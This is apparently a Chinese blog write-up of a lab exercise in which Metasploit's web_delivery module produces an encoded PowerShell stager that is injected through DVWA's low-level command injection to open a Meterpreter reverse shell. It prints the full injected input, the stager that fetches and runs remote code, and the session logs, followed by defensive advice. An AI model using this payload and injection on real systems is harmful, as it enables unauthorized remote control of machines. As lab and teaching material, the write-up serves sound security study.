利用Metasploit Web_Delivery对DVWA命令注入漏洞的渗透攻击实践

最新推荐文章于 2025-09-06 22:56:13 发布
原创 最新推荐文章于 2025-09-06 22:56:13 发布 · 1k 阅读 · 22 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #web安全 #安全 #网络安全 #dvwa

王者杯·14天创作挑战营·第5期 10w+人浏览 607人参与

利用Metasploit Web_Delivery对DVWA命令注入漏洞的渗透攻击实践

1. 摘要

本文记录了一次针对Damn Vulnerable Web Application (DVWA)中命令注入(Command Injection)漏洞的渗透测试实践。攻击者(白帽子)利用Metasploit Framework中的web_delivery模块,生成一个PowerShell负载,通过DVWA的低安全等级命令注入漏洞传递给靶机,最终成功获得了一个Meterpreter反向Shell会话。本次实验旨在揭示命令注入漏洞的严重性,并提升防御意识。

2. 实验环境

角色操作系统IP地址软件
攻击机 (Attacker)Kali Linux192.168.1.26Metasploit Framework
靶机 (Target)Windows 11192.168.1.13DVWA (安全等级: Low)

3. 攻击步骤详解

3.1 启动MSF并配置Exploit模块

首先,在Kali Linux上启动Metasploit控制台。

msfconsole

使用multi/script/web_delivery模块,该模块非常适合通过脚本语言(如Python、PHP、Powershell)交付和执行载荷。

use exploit/multi/script/web_delivery

设置Payload为windows/meterpreter/reverse_tcp,这是一个功能强大的反向连接Shell。

set payload windows/meterpreter/reverse_tcp
3.2 配置模块选项

查看需要设置的选项。

show options

根据实验环境进行配置。最关键的是设置攻击机的IP地址(LHOST)。

set lhost 192.168.1.26
set srvhost 192.168.1.26 # 通常与LHOST相同,是承载恶意脚本的服务器地址

查看可用的目标类型,我们选择PowerShell。

show targets

2

设置目标为PowerShell。

set target 2
3.3 执行模块并生成恶意载荷

运行模块,Metasploit会启动一个服务器并生成一行用于漏洞利用的PowerShell命令。

run

执行后,MSF会显示类似如下的关键信息:

[*] Using URL: http://192.168.1.26:8080/qzKo5FhM6X...
[*] Started HTTP reverse handler on http://192.168.1.26:4444
[*] Using PowerShell stager base code for windows/meterpreter/reverse_tcp
[*] Powershell command length: ....
Command to run:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAByAGYAMQBQAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAHIAZgAxAFAALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJAByAGYAMQBQAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyADYAOgA4ADAAOAAwAC8AcQB6AEsAbwA1AEYAaABNADYAWABFADcAegAvAE8ANgAzAGcAYQB2AHIAMQBKAGkAZQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyADYAOgA4ADAAOAAwAC8AcQB6AEsAbwA1AEYAaABNADYAWABFADcAegAnACkAKQA7AA==

这行编码的PowerShell命令就是我们的“武器”。

3.4 利用DVWA命令注入漏洞
  1. 在攻击机的浏览器中访问靶机DVWA:http://192.168.1.13/dvwa
  2. 登录后,在左侧Security选项卡中将安全级别设置为Low
  3. 进入Command Injection功能模块。

在输入框中,原本用于输入IP地址的地方,我们注入我们的Payload。DVWA Low级别的命令注入直接连接了用户输入,使用管道符|可以顺利执行下一条命令。

输入:

127.0.0.1 | powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAByAGYAMQBQAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAHIAZgAxAFAALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJAByAGYAMQBQAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyADYAOgA4ADAAOAAwAC8AcQB6AEsAbwA1AEYAaABNADYAWABFADcAegAvAE8ANgAzAGcAYQB2AHIAMQBKAGkAZQAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyADYAOgA4ADAAOAAwAC8AcQB6AEsAbwA1AEYAaABNADYAWABFADcAegAnACkAKQA7AA==

3

  1. 点击Submit按钮。
3.5 获取Meterpreter会话

一旦Payload在靶机上执行,它会向我们的攻击机(192.168.1.26:4444)发起连接。此时,在MSF控制台中,你会看到成功的提示。

[*] 192.168.1.13    web_delivery - Delivering Payload
[*] Sending stage (175686 bytes) to 192.168.1.13
[*] Meterpreter session 1 opened (192.168.1.26:4444 -> 192.168.1.13:49867) at 2023-10-XX XX:XX:XX +0000

列出当前活跃的会话。

sessions

7

与获得的Session进行交互。

sessions 1

交互成功,命令行提示符变为meterpreter >,标志着我们已经成功控制了目标机器。
截屏2025-09-04 09.26.09

4. 漏洞原理与防御建议

漏洞原理:
  1. 命令注入:DVWA的Low级别Command Injection页面未对用户输入($_GET['ip'])进行任何过滤。攻击者通过注入特殊字符(如|&;)将系统命令拼接至原有的ping命令中,导致任意命令执行。
  2. Web Delivery:该攻击方式无需向磁盘写入恶意文件。MSF在攻击机上搭建一个临时Web服务器,提供的Payload实质上是一段PowerShell脚本。该脚本会从服务器下载并直接在内存中执行Meterpreter的第二阶段载荷,实现了无文件攻击,具有较强的隐蔽性。
防御建议:
  1. 输入验证与过滤:对所有用户输入进行严格的验证和过滤,使用白名单机制只允许预期的字符(如IP地址只允许数字和点号)。
  2. 避免使用危险函数:在Web开发中,尽量避免使用system(), exec(), passthru(), shell_exec()等能直接执行系统命令的函数。如果必须使用,务必对参数进行严格处理。
  3. 最小权限原则:运行Web服务的应用程序账户(如Apache、IIS_USER)应遵循最小权限原则,避免授予其SYSTEM或Administrator等高权限,从而限制被入侵后的影响范围。
  4. 部署安全设备:部署WAF(Web应用防火墙)可以帮助检测和阻止常见的注入攻击。
  5. 代码审计与定期渗透测试:定期进行代码安全审计和渗透测试,主动发现并修复潜在漏洞。

5. 结论

本次实验成功利用Metasploit的web_delivery模块,通过DVWA的命令注入漏洞获得了Windows 11靶机的远程Meterpreter控制权。整个过程清晰地展示了命令注入漏洞的巨大危害——它可以直接导致服务器被完全接管。作为白帽子和开发者,理解这种攻击链至关重要,这有助于我们构建更安全、更稳固的应用系统。

Kali渗透测试:使用MetasploitWeb应用的攻击
Liu_Bruce的博客
05-15 4186
Kali渗透测试:使用MetasploitWeb应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本,它来自于DVWA,代码如下: <html> <body> <form name="ping" action="#" method="post"> &
Metasploit 命令注入漏洞渗透测试实战
悦分享
12-10 1018
很多Web应用程序向用户提供了十分便捷的系统功能。这些系统功能本来只能在操作系统的命令行工具中实现,例如Ping某个IP地址,查看ARP缓存,添加系统用户,查看、执行或者删除文件等。PHP作为一门脚本语言,本身也提供了一些可以调用外部应用程序的函数。当用户需要执行系统功能时,可以将命令提交给Web应用程序;Web应用程序再将其传递给操作系统的命令行工具并执行。但是,由于用户的输入是不确定的,Web应用程序必须保证能够过滤那些非法请求,否则这种便利的功能可能被别有用心者利用,成为攻击Web应用程序的途径。
MSF之攻击web站点漏洞获取目标机器最高权限
世间繁华梦一出
12-22 2601
利用MSF攻击web站点的漏洞获取最高权限方法一:通过web站点,使用无文件的方式攻击利用执行方法二:通过web站点,上传webshell(msfvenom后门木马),返回给msf方法三:攻击其他端口服务,拿到meterpreter 方法一:通过web站点,使用无文件的方式攻击利用执行 如何利用? 这里介绍一个msf的新模块web_delivery攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派上用场了。 web_delivery的主要目的是快速和受害者
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8743
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
Metasploit——后渗透测试阶段
m0_62063669的博客
08-14 2430
伪造一个AP,诱使别人来连这个AP,别人连了这个AP访问Internet上其他网站服务器的时候,因为流量经过这个AP,就可以在这个AP上嗅探抓包,因为有msf,可以在AP上启动一些漏洞利用模块,然后目标的流量经过AP,一旦发现目标浏览器有漏洞,通过流量分析可以判断浏览器版本是否有漏洞,尝试往流量里注入漏洞利用代码(插入到返回的流量中),一旦返回流量中 收到后有漏洞利用代码,恰好浏览器有对应漏洞,那么代码就会执行,创建新的meterpreter shell。所以设置为LHOST设置为win7的IP。.....
metasploit怎么用? 进阶(msfvenom=payloads+encoders)篇 (゚益゚メ) 渗透测试
寻觅的博客
02-06 2430
靶机搭建与配置网络环境 这里搭建环境比较复杂,可以想要手动搭建的可以参考其他大佬的博客:域渗透环境搭建。 靶场搭建还是比较复杂的,我们主要也不是做服务器运维的,所以这这里我们可以使用已经搭建好的靶场环境,这里我转载了几个已经搭建好的靶场环境放到了我的云盘里。需要的可以下载使用,下方我做测试的环境都是使用的de1ay-ATT&CK红队评估二其中的三个环境。 链接:https://pan.baidu.com/s/1snQWjtCXeQT9VJlqGtpdDw 提取码:pikp 使用非常简单,只需要将.
Notes Twenty one days-渗透攻击-红队-权限提升
qq_34801745的博客
10-07 1万+
** Notes Twentieth Day-渗透攻击-红队-权限提升(dayu) ** 作者:大余 时间:2020-10-5 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 1446
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
渗透与防御技术
热门推荐
YangYubo091699的博客
05-09 3万+
Kali操作系统的基本配置和使用 一、安装 下载KALI操作系统 https://www.kali.org/get-kali/ 二、修改root sudo passwd 三、基本工具介绍 信息搜集工具集: 主要面向网路、端口、服务识别、web指纹等一系列目标信息探测类的工具,常用工具有nmap masscan gobuster (zmap OneForAll) 漏洞分析工具集: 主要面向漏洞的发现、漏洞分析类的工具,漏洞主要面向系统、web、网络设备,常用的工具有 nikto web程序渗透
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
6. **命令注入**:在DVWA的"Command Injection"部分,攻击者可以输入带有管道符号的IP地址,后面跟着要执行的命令,如`127.0.0.1|ipconfig`,证明了命令注入漏洞的存在。 7. **Metasploit渗透测试平台**:启动MSF...
MySQL常见报错分析及解决方案总结(13)---使用 TRUNCATE 语句删除数据后,页面报错 “not found” ,数据库表自增 ID 被重置
SSHLY3的博客
09-05 461
摘要: 在Windows环境下,Java程序使用TRUNCATE清空MySQL表后,可能导致前端报"notfound"错误。原因是TRUNCATE会重置自增ID(从1开始),而业务逻辑可能依赖旧ID。解决方法包括:改用DELETE保留ID序列、手动重置自增ID为原最大值、清除缓存中的旧ID,或避免依赖自增ID连续性(如改用UUID)。核心是通过调整清表方式或业务逻辑,确保ID一致性。 (150字)
Vue基础知识-脚手架开发-子传父-props回调函数实现和自定义事件($on绑定、$emit触发、$off解绑)实现
2503_91308956的博客
09-04 963
本文演示了Vue2中两种子组件向父组件传递数据的方法:1)通过props回调函数,父组件传递回调函数给子组件,子组件调用该函数传参;2)通过自定义事件,父组件给子组件绑定事件,子组件用$emit触发并传参。
详解前端模块化导入中 .、.. 与 @ 的路径区别
2301_81781871的博客
09-04 755
.和虽为简单符号,却直接影响前端项目的模块化规范。和..是基于当前文件的相对路径,是简化绝对路径的配置型别名。在实际开发中,需根据目录层级和项目规范灵活选择,以写出清晰、可维护的导入代码。掌握路径规则,不仅能减少「模块找不到」的报错,更是前端工程化素养的基础体现。
【JavaScript】前端两种路由模式,Hash路由,History 路由
m0_74282926的博客
09-02 1291
Hash 路由:前端自给自足,后端几乎零配合;代价是 URL 与 SEO。History 路由:用户体验与 SEO 友好,但刷新/直达必须有服务端兜底,并和 API、静态资源做好“分流”。对 Go 后端来说,掌握本文几段Nginx/Caddy/Gin/GoFrame 样例配置,就能把前端 History 路由稳定落地,避免 404 与静态资源回退等典型坑。注解:真正上线前,务必按“直接打开深链刷新后退前进断网重试缓存与版本回滚”五类场景做灰度验证;
Vue3 + Ant Design Vue 实现多选下拉组件(支持分组、搜索与标签省略)
weixin_42285486的博客
09-03 1048
通用性强:可复用于任何多选列表场景技术点清晰:展示 Vue3 组合式 API + Ant Design Vue 高级用法扩展方向支持远程搜索,减少本地数据加载压力支持分组标题显示,优化用户体验支持自定义标签渲染,显示更多信息。
Date、BigDecimal类型值转换
最新发布
2301_81922209的博客
09-06 115
本文展示了前后端数据交互中日期和数值类型的转换处理。前端输入JSON数据包含日期字符串(yyyy-MM-dd和yyyy/MM/dd格式)和数值,后端通过@JsonFormat注解自动转换为Date类型,BigDecimal类型则用于精确计算。数据库中存储datetime和decimal类型数据。后端处理时,使用工具类对价格和利率进行格式化:价格保留两位小数(四舍五入),利率转换为百分比格式。最终响应数据将日期转为时间戳或格式化字符串,数值转为格式化字符串,并转换支付方式编码为描述文本。完整流程涵盖数据接收、
WebView安全实现(二)
samli的博客
09-04 910
本文总结了WebView的安全风险与防御方案。WebView的主要攻击路径包括Intent、deeplink和特殊端口/协议,风险函数如loadUrl()、evaluateJavascript()等可能被滥用。文章分析了"一句话修复方案"的局限性,列举了沙盒突破、白名单绕过等攻击手法,并提供了分层防御策略:1)基础配置加固,禁用不必要的功能;2)严格的白名单校验机制;3)运行时防护措施如子帧隔离和API验证;4)针对特定业务场景定制安全方案。
前端性能优化:请求和响应优化(HTTP缓存与CDN缓存)
北京百思可瑞教育
09-03 1166
本文详细介绍了前端性能优化中的HTTP缓存与CDN缓存策略。HTTP缓存分为强缓存(通过Cache-Control/Expires控制)和协商缓存(通过ETag/Last-Modified验证),针对不同资源推荐采用不同缓存策略。CDN缓存通过分布式节点加速资源访问,需合理配置缓存时间和刷新机制。文章还提供了Nginx/Apache配置示例、CDN部署建议及常见问题解决方案,强调通过缓存监控与调优可显著提升网站性能。建议结合文件哈希命名和版本控制来管理资源更新,实现最优缓存效果。
禁止浏览器自动填充密码的方法
wsx9172的博客
09-05 162
等配置,都没效果,最后使用的方案是input标签设置为readonly只读,使浏览器无法自动填充,页面加载完成后,再将input标签的readonly属性删除。当前有个需求是对输入框内容进行加密,加密原理是通过监听输入框输入实现,浏览器自动填充内容无法被成功加密,需要禁用浏览器自动填充。浏览器加载到html中form表单时,会尝试使用保存的当前网页信息,对网页中的特定输入框进行自动填充,比如。虽然能解决自动填充,但是点击输入框,还是会弹出自动填充下拉框,有更好的解决办法欢迎大家评论区指出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bruce_xiaowei

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值